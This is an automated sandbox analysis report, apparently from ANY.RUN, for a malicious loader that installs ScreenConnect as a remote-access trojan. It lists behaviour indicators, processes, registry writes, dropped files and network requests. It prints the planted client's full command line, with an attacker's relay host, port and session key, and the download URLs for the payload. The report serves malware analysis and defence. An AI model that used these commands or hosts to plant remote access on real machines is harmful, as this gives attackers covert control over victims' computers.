File name:

Case.Client.exe

Full analysis: https://app.any.run/tasks/07fe96e1-5870-40d2-ad9c-d1a5a86e5d27
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: April 29, 2025, 12:35:07
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
screenconnect
rmm-tool
remote
rat
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

816FFCFD0E41213B5CDEA0045F7477C4

SHA1:

05A10E49CB6B629577FA6A0DE02A01C3C6148E8B

SHA256:

972EA0E81E658CB0DAB8D8F4AB561AC2C064C3B7AC0DF0AC6A23BB157C5817C9

SSDEEP:

3072:UjLHcVw8licpWQog5Ms+f+l6xPVfq84a1A:UfoocptD5QPVfqQA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • SCREENCONNECT has been detected (SURICATA)

      • ScreenConnect.ClientService.exe (PID: 4188)

    • Connects to the CnC server

      • ScreenConnect.ClientService.exe (PID: 4188)

  • SUSPICIOUS

    • Adds/modifies Windows certificates

      • Case.Client.exe (PID: 1056)
      • dfsvc.exe (PID: 6744)

    • Reads security settings of Internet Explorer

      • dfsvc.exe (PID: 6744)
      • ScreenConnect.WindowsClient.exe (PID: 5988)
      • ScreenConnect.ClientService.exe (PID: 4188)
      • ScreenConnect.ClientService.exe (PID: 4068)
      • ScreenConnect.WindowsClient.exe (PID: 736)

    • Reads Internet Explorer settings

      • dfsvc.exe (PID: 6744)

    • The process creates files with name similar to system file names

      • dfsvc.exe (PID: 6744)

    • Executable content was dropped or overwritten

      • dfsvc.exe (PID: 6744)

    • Reads the date of Windows installation

      • dfsvc.exe (PID: 6744)
      • ScreenConnect.WindowsClient.exe (PID: 5988)

    • Screenconnect has been detected

      • ScreenConnect.ClientService.exe (PID: 4188)

    • Executes as Windows Service

      • ScreenConnect.ClientService.exe (PID: 4188)

    • SCREENCONNECT mutex has been found

      • ScreenConnect.ClientService.exe (PID: 4188)

    • Creates or modifies Windows services

      • ScreenConnect.ClientService.exe (PID: 4188)

    • Connects to unusual port

      • ScreenConnect.ClientService.exe (PID: 4188)

    • Potential Corporate Privacy Violation

      • ScreenConnect.ClientService.exe (PID: 4188)

    • There is functionality for taking screenshot (YARA)

      • ScreenConnect.ClientService.exe (PID: 4188)
      • ScreenConnect.WindowsClient.exe (PID: 736)

    • Detects ScreenConnect RAT (YARA)

      • ScreenConnect.ClientService.exe (PID: 4188)
      • ScreenConnect.WindowsClient.exe (PID: 736)

  • INFO

    • Checks supported languages

      • Case.Client.exe (PID: 1056)
      • dfsvc.exe (PID: 6744)
      • ScreenConnect.ClientService.exe (PID: 4068)
      • ScreenConnect.ClientService.exe (PID: 4188)
      • ScreenConnect.WindowsClient.exe (PID: 5988)
      • ScreenConnect.WindowsClient.exe (PID: 736)

    • Reads the machine GUID from the registry

      • Case.Client.exe (PID: 1056)
      • dfsvc.exe (PID: 6744)
      • ScreenConnect.WindowsClient.exe (PID: 5988)
      • ScreenConnect.ClientService.exe (PID: 4068)
      • ScreenConnect.ClientService.exe (PID: 4188)
      • ScreenConnect.WindowsClient.exe (PID: 736)

    • Reads Environment values

      • dfsvc.exe (PID: 6744)

    • Reads the computer name

      • Case.Client.exe (PID: 1056)
      • dfsvc.exe (PID: 6744)
      • ScreenConnect.WindowsClient.exe (PID: 5988)
      • ScreenConnect.ClientService.exe (PID: 4068)
      • ScreenConnect.ClientService.exe (PID: 4188)
      • ScreenConnect.WindowsClient.exe (PID: 736)

    • Disables trace logs

      • dfsvc.exe (PID: 6744)

    • Checks proxy server information

      • dfsvc.exe (PID: 6744)
      • slui.exe (PID: 5048)

    • Process checks whether UAC notifications are on

      • dfsvc.exe (PID: 6744)

    • Creates files or folders in the user directory

      • dfsvc.exe (PID: 6744)
      • ScreenConnect.WindowsClient.exe (PID: 5988)
      • ScreenConnect.ClientService.exe (PID: 4188)

    • Create files in a temporary directory

      • dfsvc.exe (PID: 6744)

    • Reads the software policy settings

      • dfsvc.exe (PID: 6744)
      • slui.exe (PID: 5048)

    • Process checks computer location settings

      • dfsvc.exe (PID: 6744)
      • ScreenConnect.WindowsClient.exe (PID: 5988)

    • SCREENCONNECT has been detected

      • ScreenConnect.ClientService.exe (PID: 4188)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2022:11:18 19:55:37+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.33
CodeSize: 40448
InitializedDataSize: 32768
UninitializedDataSize: -
EntryPoint: 0x14ba
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
130
Monitored processes
8
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start case.client.exe no specs dfsvc.exe screenconnect.windowsclient.exe no specs screenconnect.clientservice.exe #SCREENCONNECT screenconnect.clientservice.exe #SCREENCONNECT screenconnect.windowsclient.exe no specs svchost.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
736"C:\Users\admin\AppData\Local\Apps\2.0\GM0QC387.GCZ\LH3GWD82.VN1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\ScreenConnect.WindowsClient.exe" "RunRole" "1f7fe0c1-f6a9-4120-a2fe-279dc7fa974c" "User"C:\Users\admin\AppData\Local\Apps\2.0\GM0QC387.GCZ\LH3GWD82.VN1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\ScreenConnect.WindowsClient.exe
ScreenConnect.ClientService.exe
User:
admin
Company:
ScreenConnect Software
Integrity Level:
MEDIUM
Description:
ScreenConnect Client
Version:
23.9.10.8817
Modules
Images
c:\users\admin\appdata\local\apps\2.0\gm0qc387.gcz\lh3gwd82.vn1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1056"C:\Users\admin\Desktop\Case.Client.exe" C:\Users\admin\Desktop\Case.Client.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
1
Modules
Images
c:\users\admin\desktop\case.client.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\crypt32.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
4068"C:\Users\admin\AppData\Local\Apps\2.0\GM0QC387.GCZ\LH3GWD82.VN1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=myhostwin64.zapto.org&p=8041&s=2f26a95a-be34-48d8-9552-64bd48a40ecd&k=BgIAAACkAABSU0ExAAgAAAEAAQARwlCbNekqtvn7ehBbVwdj7uvzavA8rmmmr3yj7MR0sbp1gpODtITSSp2yopf%2ba7WKdfYEX%2fyTe6B0w%2birgqpxQHxW0KLJJ9dnyhCmBc0kgbG0vIPUmrbaML2HQr0t7mn269V%2b%2bWn87tuotq4VeGoagOdEWUVVZaGSEJ94nqZqGkrTz0RPCJC2SBT%2boKzc%2fKQO5wG%2fJpqFDDBxFZQwAzq31LnTDb6A3I3SoWMZBbyw1AOrfJaDaz8unfrictd01UIWxSfjfeZJdHg01pQ1qsSttdhfmQZCMI9%2fl6zudjwuJ52f7zCQREbAV%2bmhryBoYftW5MO08DWgvKvVv%2bp776bN&r=&i=Untitled%20Session" "5"C:\Users\admin\AppData\Local\Apps\2.0\GM0QC387.GCZ\LH3GWD82.VN1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\ScreenConnect.ClientService.exe
ScreenConnect.WindowsClient.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
23.9.10.8817
Modules
Images
c:\users\admin\appdata\local\apps\2.0\gm0qc387.gcz\lh3gwd82.vn1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
4188"C:\Users\admin\AppData\Local\Apps\2.0\GM0QC387.GCZ\LH3GWD82.VN1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=myhostwin64.zapto.org&p=8041&s=2f26a95a-be34-48d8-9552-64bd48a40ecd&k=BgIAAACkAABSU0ExAAgAAAEAAQARwlCbNekqtvn7ehBbVwdj7uvzavA8rmmmr3yj7MR0sbp1gpODtITSSp2yopf%2ba7WKdfYEX%2fyTe6B0w%2birgqpxQHxW0KLJJ9dnyhCmBc0kgbG0vIPUmrbaML2HQr0t7mn269V%2b%2bWn87tuotq4VeGoagOdEWUVVZaGSEJ94nqZqGkrTz0RPCJC2SBT%2boKzc%2fKQO5wG%2fJpqFDDBxFZQwAzq31LnTDb6A3I3SoWMZBbyw1AOrfJaDaz8unfrictd01UIWxSfjfeZJdHg01pQ1qsSttdhfmQZCMI9%2fl6zudjwuJ52f7zCQREbAV%2bmhryBoYftW5MO08DWgvKvVv%2bp776bN&r=&i=Untitled%20Session" "5"C:\Users\admin\AppData\Local\Apps\2.0\GM0QC387.GCZ\LH3GWD82.VN1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\ScreenConnect.ClientService.exe
services.exe
User:
SYSTEM
Integrity Level:
SYSTEM
Version:
23.9.10.8817
Modules
Images
c:\users\admin\appdata\local\apps\2.0\gm0qc387.gcz\lh3gwd82.vn1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\msvcrt.dll
5048C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5988"C:\Users\admin\AppData\Local\Apps\2.0\GM0QC387.GCZ\LH3GWD82.VN1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\ScreenConnect.WindowsClient.exe" C:\Users\admin\AppData\Local\Apps\2.0\GM0QC387.GCZ\LH3GWD82.VN1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\ScreenConnect.WindowsClient.exedfsvc.exe
User:
admin
Company:
ScreenConnect Software
Integrity Level:
MEDIUM
Description:
ScreenConnect Client
Exit code:
0
Version:
23.9.10.8817
Modules
Images
c:\users\admin\appdata\local\apps\2.0\gm0qc387.gcz\lh3gwd82.vn1\scre..tion_25b0fbb6ef7eb094_0017.0009_9ac1886846e1a904\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
6744"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Case.Client.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ClickOnce
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\dfsvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events
11 854
Read events
11 654
Write events
168
Delete events
32

Modification events

(PID) Process:(1056) Case.Client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:7B0F360B775F76C94A12CA48445AA2D2A875701C
Value:
(PID) Process:(1056) Case.Client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Operation:writeName:Blob
Value:
0300000001000000140000007B0F360B775F76C94A12CA48445AA2D2A875701C2000000001000000B4060000308206B030820498A003020102021008AD40B260D29C4C9F5ECDA9BD93AED9300D06092A864886F70D01010C05003062310B300906035504061302555331153013060355040A130C446967694365727420496E6331193017060355040B13107777772E64696769636572742E636F6D3121301F060355040313184469676943657274205472757374656420526F6F74204734301E170D3231303432393030303030305A170D3336303432383233353935395A3069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E6720525341343039362053484133383420323032312043413130820222300D06092A864886F70D01010105000382020F003082020A0282020100D5B42F42D028AD78B75DD539591BB18842F5338CEB3D819770C5BBC48526309FA48E68D85CF5EB342407E14B4FD37843F417D71EDAF9D2D5671A524F0EA157FC8899C191CC81033E4D702464B38DE2087D347D4C8057126B439A99F2C53B1FF2EFCB475A13A64CB3012025F310D38BB2FB08F08AE09D09C065A7FA98804935873D5119E8902178452EA19F2CE118C21ACCC5EE93497042328FFBC6EA1CF3656891A24D4C8211485268DE10BD14575DE8181365C57FB24F852C48A4568435D6F92E9CAA0015D137FE1A0694C27CC8EA1B32E6CAC2F4A7A3030E74A5AF39B6AB6012E3E8D6B9F731E1DCADE418A0D8C1234747B3A10F6EA3AB6D9806831BB76A672DD2BD441A9210818FB03B09D7C79B325AC2FF6A60548B49C193EDE1B45CE06FEB26F98CD5B2F93810E6EACE91F5BED3FB6F9361345CBC93452883362A66285FB073CE8B262506B283D45CF615194CED62E05E33F2E8E8EC0AA7B0032B91B23679BEF7AD081E75A665CCBBE34850F377911AFEDB50A246C8615898F57C02163C8328AD3986ECD4B70D53D0F847E675308DEC30937614A65B4B5D74614D3F129176DEBF58CB72102941F0D5C56D267668114113589ADC262B01F4894D59DB78CF814A3E40475FC98150738510232159608A6454C1CC211AE838197C661CCD78384530994FFF634F4CBBAA0D0853417C583D47B3FAB6EC8C320902CC6C3C0C56110203010001A38201593082015530120603551D130101FF040830060101FF020100301D0603551D0E041604146837E0EBB63BF85F1186FBFE617B088865F44E42301F0603551D23041830168014ECD7E382D2715D644CDF2E673FE7BA98AE1C0F4F300E0603551D0F0101FF04040302018630130603551D25040C300A06082B06010505070303307706082B06010505070101046B3069302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D304106082B060105050730028635687474703A2F2F636163657274732E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63727430430603551D1F043C303A3038A036A0348632687474703A2F2F63726C332E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63726C301C0603551D20041530133007060567810C01033008060667810C010401300D06092A864886F70D01010C050003820201003A23443D8D0876EE8FBC3A99D356E0021AA5F84834F32CB6E67466F79472B100CAAF6C302713129E90449F4BFD9EA37C26D537BC3A5D486D95D53F49F427BB16814550FD9CBDB685E0767E3771CB22F75AAA90CFF5936AE3EB20D1D55079889A8A8AC1B6BDA148187EDCD8801A111918CD61998156F6C9E376E7C4E41B5F43F83E94FF76393D9ED499CF4ADD28EB5F26A1955848D51AFED7273FFD90D17686DD1CB0605CF30DA8EEE089A1BD39E1384EDA6EBB369DFBE521535AC3CAE96AF1A23EDB43B833C84F38149299F5DDCE546DD95D02141F40337C03E295B2C221757352CB46D8C4341CA2A54B8DCD6F76372C853F1ACE26E918BE9007B0437F9588208270F0CCCAEFFD29355C1F893855F7378A8B09A1CB0BE9311AFF2E195C3971E1BE9CA70A06D62667B792E64E5FDE7AAC49CF2EA47492ADDB3CA49C861FE3C1561B2B23FF8FB5EA887B706BE6A0BAFD3A3F45A6C4E81691528B41C048844B964DAB4440E38DF01528CEEDF11856072A2F10C40C08643C338FAE288C3CCB8F880B0DBF3BF4CE1E7B8EEFB5EBCBB7F07713E6E7283FAC12AEA52F226C41F9825C1566CC6C0ECAC586C3F626330C074BA0D307026A6A4030484B34A85120BBAD1B8508E2590D6DCA05502BEA4A1C9EA5FDA0A71F0674E7F2D65290FDAF854821F9573BB49C03ED8645F4B4616EBF68E2266086EAC8AFA9FE941DE7631B3A8656784E
(PID) Process:(1056) Case.Client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Value:
(PID) Process:(1056) Case.Client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Operation:writeName:Blob
Value:
0300000001000000140000004C2272FBA7A7380F55E2A424E9E624AEE1C145792000000001000000640700003082076030820548A00302010202100B9360051BCCF66642998998D5BA97CE300D06092A864886F70D01010B05003069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E67205253413430393620534841333834203230323120434131301E170D3232303831373030303030305A170D3235303831353233353935395A3065310B30090603550406130255533110300E06035504081307466C6F72696461310E300C0603550407130554616D706131193017060355040A1310436F6E6E656374776973652C204C4C433119301706035504031310436F6E6E656374776973652C204C4C4330820222300D06092A864886F70D01010105000382020F003082020A0282020100EC489826D08D2C6DE21B3CD3676DB1E0E50CB1FF75FF564E9741F9574AA3640AA8297294A05B4DB68ABD0760B6B05B50CE92FF42A4E390BE776A43E9961C722F6B3A4D5C880BCC6A61B4026F9137D36B2B7E9B86055876B9FA860DBCB164FE7F4B5B9DE4799AE4E02DC1F0BEE01E5D032933A2827388F8DB0B482E76C441B1BD50909EF2023E1FB62196C994CE052266B28CD89253E6416044133139764DB5FC45702529536BF82C775F9EC81FA27DC409530325F40CDEF95B81B9CE0D42791CEE72E7BD1B36C257B52257C65A28970E457513989434BFC239E2992B193E1B3CC3F11CCDD1D26D4EC9845099AB913906A42069AF999C0071169B45A2EA1AA666F1904E8ACB05E1823A359A291FD46B4EF7AED5935BB6AB17EBF077210726930C90F01761D6544A94E8FA614CC41D817EEC734B1C3D3AFB7C58FB256F0C09EDC1459BDDBFF9940ED1958570265D67AF79A9B6A16AFFD70FC6328C9810D5DC186E39AF6FBCAD49A270F237E6BCD5DE0BC014BC3179CD79776591340311A42CA94F33416C2E01B59BD1D71DE86ACE6716BC90B2D7695D155039AA08FBAC19A4D93FB784230A20A485287A16355645FC09142C602D140FA046B7BFD75328184FF7BDF8F9E0D65E6201C8D242931047F59BD328AC353777CCEFA60408887B84FC3631301463461A1D73C0B5CC74D6D82905DDF923BDBAB027A311CC38D3FA16F639A50203010001A382020630820202301F0603551D230418301680146837E0EBB63BF85F1186FBFE617B088865F44E42301D0603551D0E04160414338CE10A6E06D9C6ED0BC6CAE736CEFB8188646A300E0603551D0F0101FF04040302078030130603551D25040C300A06082B060105050703033081B50603551D1F0481AD3081AA3053A051A04F864D687474703A2F2F63726C332E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C3053A051A04F864D687474703A2F2F63726C342E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C303E0603551D20043730353033060667810C0104013029302706082B06010505070201161B687474703A2F2F7777772E64696769636572742E636F6D2F43505330819406082B06010505070101048187308184302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D305C06082B060105050730028650687474703A2F2F636163657274732E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E637274300C0603551D130101FF04023000300D06092A864886F70D01010B050003820201000AD79F00CF4984864C8981ECCE8718AA875647F6A74608C968E16568C7AA9D711ED7341676038067F01330C91621B27A2A8894C4108C268162A31F13F9757A7D6BB3C6F19BF27C3A29896D712D85873627D827CD6471761444FABF1D31E903F791143C5B4CE5E7444AACBA36D759AEBA3069D195226755CBC675AA747F77596C53C96E083C45BBA24479D6845EEA9F2B28BA29B4DCF0BCF14AA4CE176C24E2C1B8FEC3EE16E1C086DB6FDA97388859E83BE65C03F701395B78B842C6DD1533EF642CCA6FE50F6337D3F2DFEDD8B28F2B28E0C98EDD2151392E7CC75489F48859F1DE14C81B306EB50EED7BB78BE30EAADA76767C4CA523A11EEC5A2372D6122926AB1801A6A6778E9504791487EE47D4577154988802070F80FC535957658F954CD083546C5AFB5A6567B6761275F5DB20F70AB86FEEF94C7CFC65369D325121B69A82399BC7DC1962416F0F05CF1EEE64D495A3527E464E2C68DA0187093F97B673E43DDDBCC067E00713F1565FCFF8C3772D44B40A04E600644F22A990345F9A6B5B52963E82C81A0CE91D43A230F67B37D8DEBDA40EA3D59D305E18ADC1976516C12A8BA2BCA24143B12E9527B4DCA58872AA9B3A8C6AC563FC2DC02BF51BE889516D35A4BA9D062417B5BDCC50BA945FAE26B60D6AEC03984798A6A21D3FF793CC0849E81ED55B8027411C50DB776AE8FEEF2FDC2DAFB04345261DEDC054
(PID) Process:(6744) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
Q5LOPE31V7W2LQYM4PEZ8TGG
(PID) Process:(6744) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete valueName:ComponentStore_RandomString
Value:
Q5LOPE31V7W2LQYM4PEZ8TGG
(PID) Process:(6744) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete keyName:(default)
Value:
(PID) Process:(6744) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
GM0QC387GCZLH3GWD82VN1ZM
(PID) Process:(6744) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
Operation:writeName:StateStore_RandomString
Value:
QHY1N6R849OKWW9Z1JPBVO09
(PID) Process:(6744) dfsvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
Executable files
16
Suspicious files
18
Text files
25
Unknown types
0

Dropped files

PID
Process
Filename
Type
6744dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\4NELGQJK.Y2B\5VAD9TTH.983\ScreenConnect.WindowsClient.exeexecutable
MD5:5DEC65C4047DE914C78816B8663E3602
SHA256:71602F6B0B27C8B7D8AD624248E6126970939EFFDE785EC913ACE19052E9960E
6744dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\4NELGQJK.Y2B\5VAD9TTH.983\ScreenConnect.WindowsBackstageShell.exe.configxml
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
6744dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\4NELGQJK.Y2B\5VAD9TTH.983\ScreenConnect.WindowsClient.exe.manifestxml
MD5:F4B84E283123B025A90BBDE33E2080FD
SHA256:93F9EB492B6952D8C7AA1EF1EE5A901234BA1FD2D5EF58D24E1FAEF597EA8E02
6744dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\4NELGQJK.Y2B\5VAD9TTH.983\ScreenConnect.ClientService.dllexecutable
MD5:22AF3A23BD30484514CDACF67C5B3810
SHA256:7C5442121DBA2A30AB9579EC08E111DED372CF9CF90FB3256F273980B975AFA9
6744dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\4NELGQJK.Y2B\5VAD9TTH.983\ScreenConnect.WindowsClient.exe.configxml
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
6744dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\4NELGQJK.Y2B\5VAD9TTH.983\ScreenConnect.WindowsClient.exe.genmanxml
MD5:EFA59A7F55AF829C3974A02F30EBE80C
SHA256:3E2D5CC7867AFA23663D5894127CE6E2880D3075773A249B37576EDA5088875A
6744dfsvc.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\932a2db58c237abd381d22df4c63a04a_bb926e54-e3ca-40fd-ae90-2764341e7792binary
MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
SHA256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
6744dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\4NELGQJK.Y2B\5VAD9TTH.983\ScreenConnect.WindowsClient.exe:Zone.Identifiertext
MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
6744dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\4NELGQJK.Y2B\5VAD9TTH.983\ScreenConnect.Windows.dllexecutable
MD5:29454A0CB83F28C24805E9A70E53444A
SHA256:998CC3F9AF5BD41CCF0F9BE86192BBE20CDEC08A6FF73C1199E1364195A83E14
6744dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\4NELGQJK.Y2B\5VAD9TTH.983\ScreenConnect.WindowsFileManager.exeexecutable
MD5:C333D3A6EEB74E4D76C3B9E0F6BFD04C
SHA256:998D7A0CD6B1A837489E55E99CB992088B9FDE220A1025346A461849E1F50D22
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
39
TCP/UDP connections
44
DNS requests
16
Threats
11

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6744
dfsvc.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxXWRM3y5nP%2Be6mK4cD08CEAitQLJg0pxMn17Nqb2Trtk%3D
unknown
whitelisted
6744
dfsvc.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEAuTYAUbzPZmQpmJmNW6l84%3D
unknown
whitelisted
GET
200
173.211.46.170:443
https://saastorage.info/Bin/ScreenConnect.WindowsFileManager.exe
unknown
GET
200
173.211.46.170:443
https://saastorage.info/Bin/ScreenConnect.WindowsFileManager.exe.config
unknown
GET
200
173.211.46.170:443
https://saastorage.info/Bin/ScreenConnect.WindowsBackstageShell.exe.config
unknown
6744
dfsvc.exe
GET
200
